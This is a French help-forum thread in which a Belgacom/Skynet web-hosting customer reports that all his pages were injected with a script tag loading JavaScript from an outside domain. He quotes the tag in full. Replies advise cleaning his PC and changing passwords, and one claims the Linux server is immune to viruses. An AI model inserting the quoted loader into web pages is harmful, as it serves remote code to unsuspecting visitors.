Hébergeur users.skynet.be/ - Comment les contacter ?


Niveau d'utilisateur 3

Abonné à Belgacom, j’ai un site users.skynet.be/


Le 23 mai dernier, je me suis aperçu qu’une de mes pages comportait une erreur W3C. J’ai vérifié le code, cette ligne :


<!--d47c75--><script type='text/javascript' src='http://jstoredirect.net/qw/mod.php?mod=18' name='qe18'></script><!--/d47c75-->


avait été ajoutée, je ne sais par qui.


J’ai vérifié avec Fillezilla : toutes mes pages .htm avaient subi le même traitement, elles portaient toutes la même date de modification.


Je ne connais pas les coordonnées de Skynet, je ne puis donc leur demander ce qu’il en est. (J’ai pu les joindre il y a quelques années avec les 0800 de Belgacom mais ce fut une épopée !)


J’ajoute que j’ai un autre hébergeur, en guise de dépannage, les pages .htm ont subi la même intrusion et à la même date. Or mes identifiant et mot de passe sont radicalement différents…


Aujourd’hui, nouveau piratage.

4 commentaires

Niveau d'utilisateur 7
Badge +6

Bonjour,


L'adresse est dnsmaster@skynet.be , mais il ne sauront rien faire , car tu as un virus sur ta machine.


Tu dois nettoyer ta machine et quand tu es sur qu'elle est nickel , transferer les nouvelles pages et changer ton pass d'acces sur les 2 hébergeurs.


@+Gilbertcool



Niveau d'utilisateur 3

Je vous remercie pour votre réponse.


Mon antivirus n’avait rien remarqué… Il me faudra sans doute réinstaller Windows : cela ne m’était plus arrivé depuis quelques temps !

de toute maniere users.skynet.be utilise Linux et donc insensible aux


virus mais il te faudrais vider ton répertoire sur le server et apres que ton installation


Windows actuelle vérolée soit a nouveau propre réintroduire tes données
Niveau d'utilisateur 3

Voilà : j'ai réinstallé Windows sur mon pc (huit heures !), changé tous mes mots de passe (y compris Facebook ou Google).


J'ai nettoyé le serveur 'users.skynet.be/..'


Je suis épuisé : j'espère que le résultat sera à la clé.

Commenter